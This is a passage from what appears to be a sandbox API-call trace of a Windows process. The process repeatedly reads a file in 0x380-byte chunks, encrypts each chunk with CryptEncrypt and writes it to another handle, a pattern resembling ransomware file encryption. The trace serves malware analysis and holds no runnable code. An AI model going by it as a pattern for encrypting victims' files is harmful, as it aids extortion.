lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.493] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.493] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.494] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.494] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.495] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.495] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.496] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.496] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.497] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.497] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.497] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.497] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.497] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.497] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.498] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.498] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.498] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.498] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.498] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.501] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.501] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.501] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.501] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.501] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.502] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.502] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.502] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.502] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.502] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.503] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.503] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.503] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.503] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.503] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.504] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 